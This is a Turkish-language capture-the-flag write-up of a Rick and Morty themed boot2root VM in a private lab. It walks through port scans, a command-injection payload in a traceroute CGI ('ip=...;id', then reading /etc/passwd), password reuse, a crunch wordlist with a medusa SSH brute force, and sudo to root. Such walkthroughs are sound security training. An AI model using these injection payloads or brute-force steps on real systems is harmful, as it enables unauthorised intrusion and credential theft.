rick

Rick And Morty temali basit bir Boot2Root.

amac 130 puani toplamak + root olmak.

ip —> 192.168.1.41

sudo nmap -sS -sV -A -T4 192.168.1.41 -p-

Starting Nmap 7.60 ( https://nmap.org ) at 2017-12-03 21:10 +03
Nmap scan report for 192.168.1.41
Host is up (0.00035s latency).
Not shown: 65528 closed ports
PORT      STATE SERVICE VERSION
21/tcp    open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r--    1 0        0              42 Aug 22 05:10 FLAG.txt
|_drwxr-xr-x    2 0        0               6 Feb 12  2017 pub
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to ::ffff:192.168.1.35
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp    open  ssh?
| fingerprint-strings:
|   NULL:
|_    Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-31-generic x86_64)
80/tcp    open  http    Apache httpd 2.4.27 ((Fedora))
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.27 (Fedora)
|_http-title: Morty's Website
9090/tcp  open  http    Cockpit web service
|_http-title: Did not follow redirect to https://192.168.1.41:9090/
13337/tcp open  unknown
| fingerprint-strings:
|   NULL:
|_    FLAG:{TheyFoundMyBackDoorMorty}-10Points
22222/tcp open  ssh     OpenSSH 7.5 (protocol 2.0)
| ssh-hostkey:
|   2048 b4:11:56:7f:c0:36:96:7c:d0:99:dd:53:95:22:97:4f (RSA)
|   256 20:67:ed:d9:39:88:f9:ed:0d:af:8c:8e:8a:45:6e:0e (ECDSA)
|_  256 a6:84:fa:0f:df:e0:dc:e2:9a:2d:e7:13:3c:e7:50:a9 (EdDSA)
60000/tcp open  unknown
| fingerprint-strings:
|   NULL, ibm-db2:
|_    Welcome to Ricks half baked reverse shell...
3 services unrecognized despite returning data. If you know the
service/version,
please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port22-TCP:V=7.60%I=7%D=12/3%Time=5A243E00%P=x86_64-pc-linux-gnu%r(NULL
SF:,42,"Welcome\x20to\x20Ubuntu\x2014\.04\.5\x20LTS\x20\(GNU/Linux\x204\.4
SF:\.0-31-generic\x20x86_64\)\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port13337-TCP:V=7.60%I=7%D=12/3%Time=5A243E00%P=x86_64-pc-linux-gnu%r(N
SF:ULL,29,"FLAG:{TheyFoundMyBackDoorMorty}-10Points\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port60000-TCP:V=7.60%I=7%D=12/3%Time=5A243E06%P=x86_64-pc-linux-gnu%r(N
SF:ULL,2F,"Welcome\x20to\x20Ricks\x20half\x20baked\x20reverse\x20shell\.\.
SF:\.\n#\x20")%r(ibm-db2,2F,"Welcome\x20to\x20Ricks\x20half\x20baked\x20re
SF:verse\x20shell\.\.\.\n#\x20");
MAC Address: 08:00:27:BF:52:95 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.8
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
...

port 60000, 13337, 9090, 80, 22, 21 acik. bazi portlarin headerlari sizmis

port 60000 ‘e netcat ile baglaniyorum

nc 192.168.1.41 60000
Welcome to Ricks half baked reverse shell...
# ls
FLAG.txt
# cat FLAG.txt
FLAG{Flip the pickle Morty!} - 10 Points

toplam 10 puan oldu

port 13337 (.bkz) den gelicek flag nmap ciktisinda gorunuyor zaten.

-YA GORUNMESEYDI??

o zaman dilerseniz aciklayalim

-BIZ MI SOYLEYECEGIZ SANA HER SEYI

anladim abi…

nc 192.168.1.41 13337
FLAG:{TheyFoundMyBackDoorMorty}-10Points

port 9090 ‘da cockpit web service adinda bir sey varmis.

girdigimde flagi goruyorum

FLAG {There is no Zeus, in your face!} – 10 Points

-E LOGIN DE VAR BURDA SEN BIZI MI KANDIRIYOSUN?

ne biliyim ben

port 80 icin browserdan 192.168.1.41 adresine gidiyorum

zor bir vm olmadigindan manuel de gerceklestirebilirdim aslinda ama niktonun ciktisini gormekte de fayda var

nikto -h http://192.168.1.41/
...
+ Server: Apache/2.4.27 (Fedora)
...
+ Allowed HTTP Methods: HEAD, GET, POST, OPTIONS, TRACE
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-3268: /passwords/: Directory indexing found.
+ OSVDB-3092: /passwords/: This might be interesting...
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
...
+ 1 host(s) tested

robots.txt veya cgi-bin cikmadi

dirbuster ile daha fazla sonuca ulasilabilirdi.

192.168.1.41/passwords/ altinda FLAG.txt ve passwords.html adlarinda 2 dosya var passwords.html iceriginde sakali komiklikler barindiriyo

Wow Morty real clever. Storing passwords in a file called passwords.html? You've really done it this time Morty. Let me at least hide them.. I'd delete them entirely but I know you'd go bitching to your mom. That's the last thing I need.
<!--Password: winter-->

FLAG.txt iceriginde de flag var.

FLAG{Yeah d- just don't do it.} - 10 Points

192.168.1.41/robots.txt dosyasinin icerigi de hafif sakali:

They're Robots Morty! It's ok to shoot them! They're just Robots!

/cgi-bin/root_shell.cgi
/cgi-bin/tracertool.cgi
/cgi-bin/*

root_shell.cgi icerigi:

--UNDER CONSTRUCTION--
<!--HAAHAHAHAAHHAaAAAGGAgaagAGAGAGG-->
<!--I'm sorry Morty. It's a bummer.-->

asil olay /cgi-bin/tracertool.cgi icinde gerceklesiyor.

ss.

ip olarak 192.168.1.32 verdigimde bana

traceroute to 192.168.1.32 (192.168.1.32), 30 hops max, 60 byte packets

ciktisini verdigine gore bu linuxtaki traceroute komutu

bu degiskeni de get metoduyla ip degeriyle aliyor

demek ki ben bu ipyi yazdigimda serverda

traceroute 192.168.1.32

komutu calisiyo

o zaman en basit yontemle bunun yaninda baska bir komut calistirmayi deneyebilirim

bunun icin de ip degiskenini 192.168.1.32;id olarak degistiriyorum

eger ‘;’ karakterini engelleyen bir filtre yoksa

serverda once traceroute 192.168.1.32 ardindan

id komutu calisacaktir.

http://192.168.1.41/cgi-bin/tracertool.cgi?ip=192.168.1.32;id urlsinin ciktisi:

traceroute to 192.168.1.32 (192.168.1.32), 30 hops max, 60 byte packets
 1  localhost.localdomain (192.168.1.41)  3098.914 ms !H  3096.421 ms !H  3096.411 ms !H
uid=48(apache) gid=48(apache) groups=48(apache) context=system_u:system_r:httpd_sys_script_t:s0

komutlarin ikisi de calisti.

sistemdeki kullanicilari ogrenmem gerektiginden

ip degerine 192.168.1.32;cat /etc/passwd veriyorum

traceroute to 192.168.1.32 (192.168.1.32), 30 hops max, 60 byte packets
 1  localhost.localdomain (192.168.1.41)  3101.921 ms !H  3099.147 ms !H  3099.130 ms !H
                         _
                        | \
                        | |
                        | |
   |\                   | |
  /, ~\                / /
 X     `-.....-------./ /
  ~-. ~  ~              |
     \             /    |
      \  /_     ___\   /
      | /\ ~~~~~   \  |
      | | \        || |
      | |\ \       || )
     (_/ (_/      ((_/

cat komutunu ascii artla degistirmisler gzl.

cat yerine more veriyorum

...
::::::::::::::
/etc/passwd
::::::::::::::
...
RickSanchez:x:1000:1000::/home/RickSanchez:/bin/bash
Morty:x:1001:1001::/home/Morty:/bin/bash
Summer:x:1002:1002::/home/Summer:/bin/bash
...
#isime yarayacak kullanicilari gosteriyorum sadece

port 22 calismiyor fakat port 22222 calisiyor

ssh icin elimde yeterli bilgi var mi onemli olan bu

3 kullanici var RickSanchez, Morty, Summer ve onceden buldugum winter parolasi var.

winter Summer kullanicisinin parolasi olabilir

ssh [email protected] -p 22222
[email protected]'s password:
Last login: Wed Aug 23 19:20:29 2017 from 192.168.56.104
[[email protected] ~]$

basarili.

[[email protected] ~]$ ls -la
total 20
drwx------. 2 Summer Summer  99 Sep 15 11:49 .
drwxr-xr-x. 5 root   root    52 Aug 18 18:20 ..
-rw-------. 1 Summer Summer   1 Sep 15 11:51 .bash_history
-rw-r--r--. 1 Summer Summer  18 May 30  2017 .bash_logout
-rw-r--r--. 1 Summer Summer 193 May 30  2017 .bash_profile
-rw-r--r--. 1 Summer Summer 231 May 30  2017 .bashrc
-rw-rw-r--. 1 Summer Summer  48 Aug 22 02:46 FLAG.txt
[[email protected] ~]$ more FLAG.txt
FLAG{Get off the high road Summer!} - 10 Points
[[email protected] ~]$ cd ..
[[email protected] home]$ ls
Morty  RickSanchez  Summer
[[email protected] home]$ cd Morty
[[email protected] Morty]$ ls -la
total 64
drwxr-xr-x. 2 Morty Morty   131 Sep 15 11:49 .
drwxr-xr-x. 5 root  root     52 Aug 18 18:20 ..
-rw-------. 1 Morty Morty     1 Sep 15 11:51 .bash_history
-rw-r--r--. 1 Morty Morty    18 May 30  2017 .bash_logout
-rw-r--r--. 1 Morty Morty   193 May 30  2017 .bash_profile
-rw-r--r--. 1 Morty Morty   231 May 30  2017 .bashrc
-rw-r--r--. 1 root  root    414 Aug 22 03:06 journal.txt.zip
-rw-r--r--. 1 root  root  43145 Aug 22 03:04 Safe_Password.jpg
[[email protected] Morty]$ cp journal.txt.zip ~/
[[email protected] Morty]$ cp Safe_Password.jpg ~/
[[email protected] Morty]$ exit
logout
Connection to 192.168.1.41 closed.

Morty kullanicisinin home dizininde buldugum dosyalari Summer kullanicisinin home dizinine kopyaladim scp ile kendi makinama aktaricam

scp -P 22222 [email protected]:/home/Summer/Safe_Password.jpg ~
scp -P 22222 [email protected]:/home/Summer/journal.txt.zip ~

Safe_Password.jpg dosyasinda rick’in bir resmi var oncelikle exif bilgilerine bakiyorum

exiftool Safe_Password.jpg

ciktida ise yarar bir sey yok

strings komutunu deniyorum dosyaya herhangi bir text eklenmis olabilir.

strings Safe_Password.jpg
...
The Safe Password: File: /home/Morty/journal.txt.zip. Password: Meeseek
...

journal.txt.zip dosyasinin parolasini aldigima gore

cat journal.txt
Monday: So today Rick told me huge secret. He had finished his flask and was on to commercial grade paint solvent. He spluttered something about a safe, and a password. Or maybe it was a safe password... Was a password that was safe? Or a password to a safe? Or a safe password to a safe?

Anyway. Here it is:

FLAG: {131333} - 20 Points

hem flag hem de rick’ e ait bir parola bulmus olduk.

RickSanchezin dosyalarina bakma vakti

[[email protected] ~]$ cd ../RickSanchez/
[[email protected] RickSanchez]$ ls
RICKS_SAFE  ThisDoesntContainAnyFlags
[[email protected] RickSanchez]$ ls -larh
total 12K
drwxrwxr-x. 2 RickSanchez RickSanchez  26 Aug 18 20:26 ThisDoesntContainAnyFlags
drwxr-xr-x. 2 RickSanchez RickSanchez  18 Sep 21 09:50 RICKS_SAFE
-rw-r--r--. 1 RickSanchez RickSanchez 231 May 30  2017 .bashrc
-rw-r--r--. 1 RickSanchez RickSanchez 193 May 30  2017 .bash_profile
-rw-r--r--. 1 RickSanchez RickSanchez  18 May 30  2017 .bash_logout
drwxr-xr-x. 5 root        root         52 Aug 18 18:20 ..
drwxr-xr-x. 4 RickSanchez RickSanchez 113 Sep 21 10:30 .
[[email protected] RickSanchez]$ cd ThisDoesntContainAnyFlags/
[[email protected] ThisDoesntContainAnyFlags]$ ls
NotAFlag.txt
[[email protected] ThisDoesntContainAnyFlags]$ more NotAFlag.txt
hhHHAaaaAAGgGAh. You totally fell for it... Classiiiigihhic.
But seriously this isn't a flag..
[[email protected] ThisDoesntContainAnyFlags]$ cd ../RICKS_SAFE/
[[email protected] RICKS_SAFE]$ ls -larh
total 12K
-rwxr--r--. 1 RickSanchez RickSanchez 8.5K Sep 21 10:24 safe
drwxr-xr-x. 4 RickSanchez RickSanchez  113 Sep 21 10:30 ..
drwxr-xr-x. 2 RickSanchez RickSanchez   18 Sep 21 09:50 .
[[email protected] RICKS_SAFE]$ cp safe ~/
[[email protected] RICKS_SAFE]$ exit
logout
scp -P 22222 [email protected]:/home/Summer/safe ~
./safe
Past Rick to present Rick, tell future Rick to use GOD DAMN COMMAND LINE AAAAAHHAHAGGGGRRGUMENTS!
//// YETER ARTIK YETER LAN YETERRRRR
./safe 131333
decrypt: 	FLAG{And Awwwaaaaayyyy we Go!} - 20 Points
Ricks password hints:
 (This is incase I forget.. I just hope I don't forget how to write a script to generate potential passwords. Also, sudo is wheely good.)
Follow these clues, in order
1 uppercase character
1 digit
One of the words in my old bands name.

bir flag daha ve bir parola icin de ipuclari da aldik.

kafamda olusan senaryoya gore

bahsedilen muzik grubunun adi bulunacak; crunch vb bir wordlist olusturucuyla wordlist olusturulacak; hydra, medusa gibi bruteforce login yapabilen bir toolla RickSanchez kullanicisinin parolasi bulunacak son olarak ssh uzerinden kullaniciya baglanilacak.

(Grubun adi The Flesh Curtains)

crunch 10 10 -t ,%Curtains > ricks.list
Crunch will now generate the following amount of data: 2860 bytes
0 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 260
crunch 7 7 -t ,%Flesh > ricks2.list
Crunch will now generate the following amount of data: 2080 bytes
0 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 260
medusa -h 192.168.1.41 -u RickSanchez -P ~/ricks.list -n 22222 -M ssh
...
...
ACCOUNT FOUND: [ssh] Host: 192.168.1.41 User: RickSanchez Password: P7Curtains [SUCCESS]
ssh [email protected] -p 22222
[[email protected] RICKS_SAFE]$ sudo su
[[email protected] RICKS_SAFE]# cd
[[email protected] ~]# ls -larh
total 36K
-rw-r--r--.  1 root root  129 Feb 12  2017 .tcshrc
drwx------.  2 root root   25 Aug 22 08:21 .ssh
drwxr-----.  3 root root   19 Aug 21 17:35 .pki
-rw-------.  1 root root   32 Aug 22 10:16 .lesshst
-rw-r--r--.  1 root root   40 Aug 22 07:37 FLAG.txt
-rw-r--r--.  1 root root  100 Feb 12  2017 .cshrc
-rw-r--r--.  1 root root  176 Feb 12  2017 .bashrc
-rw-r--r--.  1 root root  176 Feb 12  2017 .bash_profile
-rw-r--r--.  1 root root   18 Feb 12  2017 .bash_logout
-rw-------.  1 root root    7 Sep 15 11:51 .bash_history
-rw-------.  1 root root 1.2K Aug 18 18:16 anaconda-ks.cfg
dr-xr-xr-x. 17 root root  236 Aug 18 19:16 ..
dr-xr-x---.  4 root root  191 Aug 25 14:30 .
[[email protected] ~]# more FLAG.txt
FLAG: {Ionic Defibrillator} - 30 points

root olundu fakat hala 10 puan eksik. port 21e bakmadim

port21 anon ftp logine izin veriyor bunu nmap ciktisinda gormustum.

ftp 192.168.1.41
Connected to 192.168.1.41.
220 (vsFTPd 3.0.3)
Name (192.168.1.41:d1scharg3d): anonymous    
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -larh
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 0        0               6 Feb 12  2017 pub
-rw-r--r--    1 0        0              42 Aug 22 05:10 FLAG.txt
drwxr-xr-x    3 0        0              33 Aug 22 05:10 ..
drwxr-xr-x    3 0        0              33 Aug 22 05:10 .
226 Directory send OK.
ftp> get FLAG.TXT
local: FLAG.TXT remote: FLAG.TXT
200 PORT command successful. Consider using PASV.
550 Failed to open file.
ftp> cd pub
250 Directory successfully changed.
ftp> ls -larh
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    3 0        0              33 Aug 22 05:10 ..
drwxr-xr-x    2 0        0               6 Feb 12  2017 .
226 Directory send OK.
ftp> exit
221 Goodbye.
cat FLAG.txt
FLAG{Whoa this is unexpected} - 10 Point

bb